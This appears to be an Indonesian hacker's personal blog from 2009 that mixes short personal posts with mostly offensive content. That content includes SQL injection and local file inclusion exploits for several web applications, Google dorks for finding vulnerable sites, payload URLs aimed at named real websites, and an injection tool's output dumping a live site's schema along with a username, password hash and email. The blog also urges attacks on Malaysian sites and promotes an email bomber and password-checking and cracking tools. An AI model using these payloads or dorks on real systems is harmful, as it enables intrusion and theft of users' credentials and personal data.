Semuanya adalah Semu......!!!!

Browser by AlphaDog

Download Link here!.

supported ):
- Google
- Yahoo
- You tube
- Aol
- Alta vista
- All the web
- Bing
-Ask
- Anime Freak xD
- Verizon ....

-It has section called SQL helper .

- Has Email bomber .. which has already hacked Gmails :)

- Has SQL and RFI dork section so you can search for vunl. sites ..

Dapat Nemu Past tadi jalan2 ke Negara Google

Rapid Account Checker

Demo:

Code: http://linkvn.info/checker/

Download : here!

Next Malingsial - >>

http://www.e3.net.my/product_detail.php?id=1+AND+1=2+UNION+SELECT+concat_ws%280x7c,id
,username,password,email%29,2%20from%20account--

1|frankbaoxi|5cb804628391408dfa0c4723b028ef27|frank@e3.net.my

[+] URL: http://www.e3.net.my/product_detail.php?id=1+AND+1=2+UNION+SELECT+darkc0de,1--
[+] Evasion Used: "+" "--"
[+] 09:41:47
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: e3net_e3
User: e3net_e3@localhost
Version: 5.0.81-community
[+] Showing all databases current user has access too!
[+] Number of Databases: 1

[0] e3net_e3

[+] e3net_e3(12) :
[1] account(1) :
id,username,password,last_login,email,name,
[2] blocked(0) :
blockedid,ip,polls,
[3] event_cat(2) :
id,name,date,desc,count,
[4] event_photo(16) :
id,cat_id,image,thumb,
[5] ip(66) :
ipid,title,ip,vote,
[6] news(46) :
id,name,date,content,image,
[7] options(43) :
optionid,pollid,options,images,votes,order_id,
[8] polls(5) :
pollid,title,starts,expires,vote,voting,results,graph,resultsvotes,ip,cookies,subdate,status,
[9] product_categories(53) :
id,level,parent,name,
[10] product_photo(64) :
id,product_id,image,thumb,
[11] products(78) :
id,cat_id,primary,name,price,desc,home_img,image,thumb,hit,status,update,
[12] promotions(4) :
id,primary,name,start_date,end_date,desc,image,

mesti di view source .. klo gk gt gk kelihatan.... menurut ku sech...
coba aja sendiri ... xixiixix

Telkomsel Flash BIKIN EMOSI...!!!

Ah..... gara2 telkomselflash yg ada bikin emosi aja....
Tanya Kenapa ????

TAU GAK SEH.... gw itu udah datang ke grapari nya telkomsel yg ada di jalan pemuda surabaya depan delta itu yg diujung jalan, bah lengkap pisan....
udah datang jauh2 antri2 sampe no antrian 485 . hanya karena mau berlangganan telkomselflash. dan cs nya bilang mau disurvey jumat... karena gw datangnya hari selasa tgl 8 - 09.

its ok, gk ada masalah dg org telkomsel yg datang buat survey , karena tepat seperti apa yg dijanjikan. datang hari jumat. nah setelah ngobrol2 kata orang telkomselnya perlu survey ke alamat toko yg di ngaglik, karena waktu ktp masih ikut alamat lama. jadi perlu survey ke toko pada hari sabtu.

Mau tidak mau ya nurut aja, pegawai toko sudah kupesan kalau hari sabtu ada orang telkomsel datang survey.......

disini mulai emosi ...........
udah pas hari sabtu ... gk ada kabar dr orang telkomsel , jangankan datang , pemberitahuan klo ditunda aja gk ada......

sampai senin hari ini pun ... gk ada kabar dari orang telkomsel...

PARAH..... BIKIN EMOSI AJA.... INI MAU LANGGANAN BUKAN MAU MINTA ... MAU LANGGANAN YG PRO PUN YG HARGA 400rb , ITU AJA GK HIRAUKAN..... APALAGI MINTA .. APALAGI MAU LANGGANAN YG 125RB ... AH...

PARAH.....

SANGAT MENGECEWAKAN....!!!!!

Powered by iControl™

================================================
Powered by iControl™
vendors : http://www.icontrolmore.com
by : Angela Chang
contact : angel@ch4ng.cc
================================================

Dork :
"Powered by iControl™"

Vuln :

http://localhost.com/index.php?fuseaction=p0004.&mod=-45/**/UNION/**/SELECT/**/0,concat_ws(0x7c,account_user_id,account_user_username,account_user_password),2,3 from account_users/*

Demo :
http://icontrolmore.com/index.php?fuseaction=p0004.&mod=-45/**/UNION/**/SELECT/**/0,concat_ws%280x7c,account_user_id,account_user_username,account_user_password%29,2,3%20from%20account_users/*

http://stuttgartarkansas.org/index.php?fuseaction=p0004.&mod=-45/**/UNION/**/SELECT/**/0,concat_ws(0x7c,account_user_id,account_user_username,account_user_password),2,3 from account_users/*

===============================================

Silahkan Coli...

09 - 09 - 2009

Ehm..... urutan angka yg bagus....

angka 9 , angka yg banyak digemari.. alias angka favorite...
apalagi bagi org chinese... angka 9 diyakini sebagai angka keberuntungan...
ya ini adalah mitos.. percaya gk percaya sech ..
tapi memang angka 9 sendiri memiliki arti keberuntungan , bagi org islam angka 9 adalah berarti sebagai keadilan.. bener gk ya ?ixixixi saya juga tau waktu denger berita... hehehhe

Tapi buat saya .. angka yg paling saya suka yaitu angka 7, kenapa 7 ... ? jawaban saya adalah karena 7 (tujuh ) bagi adalah angka yg simple... gk neko2 kata org jawa bilang... dan sederhana sekali tapi memiliki karakter..

ya selera dan penilaian orang memang tidak sama... begitupun juga dengan saya... eheheheh banyak angka yg diartikan sebagai keberuntungan dan kesialan, contoh nya seperti angka 13 .. tidak ada disebuah hotel memiliki kamar no 13 ato lantai 13 ... tanya kenapa ? saya jg tidak tau pasti... xixixix tapi kata nya sech angka 13 itu adalah angka setan.. tapi gk tau lagi dah...

Angela 178 itu juga artinya bgs... dan memiliki arti berkembang terus...
tapi ya kembali kepada kepercayaan dan keyakinan masing2.

bagi saya angka 7 is the best... sederhana , gk diatas gk dibawah . gk neko2 , gk muter2 kek angka 8 , xixiix dan yg pasti memiliki karakter tidak seperti angka 1, sama2 sederhana tapi tidak berkarakter...

Pengennya nanti mau ganti plat nomor di mobil ku menjadi L 77 LL tapi berapa duit yaks... aaaaaaaaaaaa... xixiixxi , semoga mami berbaik hati mau biayain buat ganti plat nomor....
wkekkekekkee

Semoga dihari dan ditanggal ini , kita mendapat keberuntungan.... karena hari ini adalah tanggal 9 bulan 9 tahun 2009

amen....!!

angela

Md5 Cr4cker [v 1.5]

Download here!

Cracker:

Gdataonline
Md5decryption
Hashkiller
Passcracking
Insidepro
Md5crack
Md5Live
Md5hood
Icebreaker
Securitystats

Options:

Create Md5
Crack Md5
Save(Export)
Tray Icon
Clear

Start Options:
"-stext Hash C:\log.txt"

Version: 1.5
Coder: Kazuya (Ich

MalingSial vuln

http://whatif.net.my/projects/apostrophe08/panel.php?id=2+AND+1=2+UNION+SELECT+0,1,2,3,4--

[+] apostrophe08(8) :
[1] announcement(11) :
id,type,title,thumb,description,link,timestamp,
[2] flashviewer(3) :
id,sortid,filename,type,pausetime,imgTitle,URLlink,rid,
[3] inspire(7) :
id,title,author,type,thumb,src,timestamp,
[4] news(3) :
id,title,content,status,timestamp,
[5] panel(6) :
id,name,img,description,timestamp,
[6] programme(6) :
id,mode,name,site,img,description,submission_session,ext_form,timestamp,
[7] submission(30) :
id,pid,sortid,uname,uic,ucontact,uemail,uaddress,umisc,stype,svalue,sref,stitle,fthumb,approved,timestamp,
[8] users(3) :
id,uname,upass,disp_name,role,type,last_login,

xixixixix, kok pada rame ya ganyang malingsial...

gk sengaja nemu web ini ya ws... males nyoliin web malaysia sech gw..
nafsu nya sama web uk...
jadi sopo yg mau nyoliin itu web.. monggo dah...

Sql injection Scanner

for download here!.

Semoga Berguna yaks..

mayan bisa c0li biarpun ndak ada botnet... xxixixxixix
ya emang gk semaksimal klo c0li nya manual dari ums google sech...
nama nya juga tools ya gt deh ...

tapi bagaimana pun manual lebih mantabb lha... xxixixi

G-Mail Password Checker

Semoga Berguna .... hasil c0liin ums google .... dapat ini.. mayan posting aja sapa tau Berguna...
xixixixixixi

for download here!

E-commerce Solutions by BangkokDomain.com

==============================================
E-commerce Solutions By BangkokDomain
Vendors : http://www.bangkokdomain.com/
By : Angela Chang
contact : angel@ch4ng.cc
==============================================

Dork :

inurl:index.php?page=product&productid=

Vuln :

http://localhost.com/index.php?page=product&productid=100+AND+1=2+UNION+SELECT+0,1,concat_ws(0x7c,id,uname,email,login_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+member--

Demo site :

http://www.bangkokspyshop.com/index.php?page=product&productid=100+AND+1=2+UNION+SELECT+0,1,concat_ws%280x7c,id,uname,email,login_password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+member--

================================================

InReal Internet Technology Co., Ltd.

========================================
InReal Internet Technology Co., Ltd.
vendors : http://www.inreal.com.tw/
by : Angela Chang
========================================
Dork :

Copyright © 2005 InReal Internet Technology Co., Ltd. All Rights Reserved

vuln :

http://localhost.com/products/products_show.php?pid=146&cid=207+AND+1=2+UNION+SELECT+0,concat_ws(0x7c,id,username,password,email),2+
from+members_eng--

demo site :

http://www.necoparts.com/products/products_show.php?pid=146&cid=207+AND+1=2+UNION+SELECT+0,concat_ws%280x7c,id,username,password,email%29,2+from+members_eng--

=========================================

Plogger 3.0

============================================

[0] Plogger 3.0 Remote Blind SQL Injection Vulnerability

Software : Plogger 3.0
Vendor : http://www.plogger.org/
Author : Angela Chang
Contact : angel@ch4ng.cc
Date : 11 August 2009
================================================

[o] Dork

"Powered by Plogger"

[+] Vulnerabilities
http://www.plogger.org/demo/plog-rss.php?level=collection&id=2 and 1=1 <-- true
http://www.plogger.org/demo/plog-rss.php?level=collection&id=2 and 1=2 <-- false

[o] Demo Site

http://www.plogger.org/demo/plog-rss.php?level=collection&id=2%20and%20substring((SELECT%20admin_username%20FROM%20plogger_config%20LIMIT%200,1),1,5)=char(97,100,109,105,110)

================================================

[o] Greetz : -:- SkyCreW -:-

Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf , home_edition2001

===============================================

dB Masters Multimedia Directory

===============================================
[0] dB Masters Multimedia Directory SQL Injection Vulnerability

Software : dB Masters Multimedia Directory Link
Vendor : http://www.dbmasters.net/
Author : Angela Chang
Contact : mizz_4ng3l@yahoo.com
Date : 5 August 2009
===============================================

[o] Dork

"Powered by dB Masters Multimedia Directory"

[o] Exploit

http://localhost/[path]/index.php?ax=deadlink&id=[SQL]
http://localhost/[path]/index.php?ax=list&cat_id=[SQL]

[o] Demo Site

http://webmitter.com/link18/index.php?ax=deadlink&id=-2 UNION SELECT 0,concat_ws(0x7c,id,url,email,password),2 from links--
http://www.judykerr.com/links/index.php?ax=list&cat_id=-8 UNION SELECT 0,1,2,concat_ws(0x7c,id,url,email,password),4 from links--

====================================================
[o] Greetz : -:- SkyCreW -:-

Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf , home_edition2001

====================================================

CBAuthority - ClickBank Affiliate Management

-:- CBAuthority - ClickBank Affiliate Management
SQL Injection Vulnerability -:-

Vendor : http://www.cbauthority.com/
Author : Angela Chang
Contact : angel@ch4ng.cc
Date : 17 august 2009
-------------------------------------------------------------------------------

Dork :

Powered by CBAuthority

Vulnerabilities :

http://localhost/path/main.php?command=view_product&id=-1 UNION SELECT 0,concat_ws(0x7c,username,password,email),2,3,4,5,6,7,8,9,10,11,12,13 from clickbank_admin--

Demo :

http://www.cbauthority.com/demo/main.php?command=view_product&id=-18 UNION SELECT 0,concat_ws(0x7c,username,password,email),2,3,4,5,6,7,8,9,10,11,12,13 from clickbank_admin--

-----------------------------------------------------------------------------------
Greetz : -:- SkyCreW -:-

Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf , home_edition2001 , str0ke
-----------------------------------------------------------------------------------

# milw0rm.com [2009-08-18]

bug ke 4 ku

In-Portal 4.3.1

@ ========================================================================@
    Title    : Local File Inclusion Vulnerability              
    Software : In-Portal 4.3.1
    Vendor   : http://www.in-portal.net/                                                                                            [-]
    Date     : 01 August 2009 (Indonesia)
    Author   : Angela Chang
     Contact  : mizz_4ng3l@yahoo.com
                                                                            
@ =========================================================================@
                                                                                                                                                                                   
[-] Dork                                                                                                                                                                               

"Powered by In-portal"

[-] Exploit                                                                                                                                                                           

http://[site]/[path]/index.php?env=-/[LFI]

[-] Demo                                                                                                                                                                               

http://www.in-portal.net/demo/index.php?env=-/../../../../../../../../../..
/../../../../../etc/passwd
                                                                                                                                                                                        
{o} ========================================================================{o}

   Greetz   :   -:-  SkyCreW  -:-

Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf ,   home_edition2001
                     str0ke

{o} ========================================================================{o}

# milw0rm.com [2009-08-04]
bug ke 3 ku

http://milw0rm.com/exploits/9358

ActiveKB Knowledgebase version X.X

[o]------------------------------------------------------------------------[x]
|  Local File Inclusion Vulnerability                                     
[o]------------------------------------------------------------------------[o]
|  Software : ActiveKB Knowledgebase version X.X                             |
|  Vendor    : http://www.interspire.com/activekb/                           |
|  Date         : 02 April 2009                                              |
|  Author     : Angela Chang                                                 |
|  Contact   :  mizz_4ng3l@yahoo.com                                         |
[o]--------------------------------------------------------------------------[o]

[»] Google Dork

"Powered by ActiveKB Knowledgebase Software"
inurl:loadpanel.php?Panel=

[»] Vulnerable

./loadpanel.php

[»] Exploit

http://[site]/[path]/loadpanel.php?Panel=[LFI]

[»] Sample

http://help.theedweb.com/activekb/loadpanel.php?Panel=[LFI]
http://my.myriadnetwork.com/kb//loadpanel.php?Panel=[LFI]

[o]---------------------------------------------------------------------------[x]
|  Greetz     :    Speciale Thanks FoR :                                        |
[o]---------------------------------------------------------------------------[o]
|    Vrs-hCk , Nyubi (Solpot) , OoN_Boy                                         |
[o]-----------------------------------------------------------------------------[o]

# milw0rm.com [2009-04-03]



bug kedua ku nech
http://milw0rm.com/exploits/8346

Webscene eCommerce

############################################

Webscene eCommerce (level) Remote Sql Injection

vendor : http://www.webscenesolutions.com/ecommerce-shopping-websites-edinburgh.htm

#############################################

Bug Found By :Angela Chang (12-10-2008)
contact: angel@ch4ng.cc
#######################################

Greetz: nyubi & Vrs-Chk
especially thx to str0ke @ milw0rm.com

############################################

vuln file : productlist.php

Input passed to the "level" is not properly verified
before being used. This can be exploited to execute
remote sql injection.

exploit : http://somehost/productlist.php?categoryid=20&level=[sql]
http://somehost/productlist.php?categoryid=20&level=-4 union select concat(loginid,0x2f,password) from adminuser--

Login admin : http://somehost/admin/

Demo Site : http://www.abcbeautyshop.co.uk/productlist.php?categoryid=20&level=-4%20union%20select%20concat(loginid,0x2f,password)%20from%20adminuser--

Google dork : inurl:productlist.php?categoryid= level

#############################################
http://www.securityfocus.com/archive/1/497324/30/0/threaded

bug pertama ku , ehheeeheh pertama kali belajar sql ya dapatlha ini bug...

o--::-::-::-@NG3L@-::-::-::--o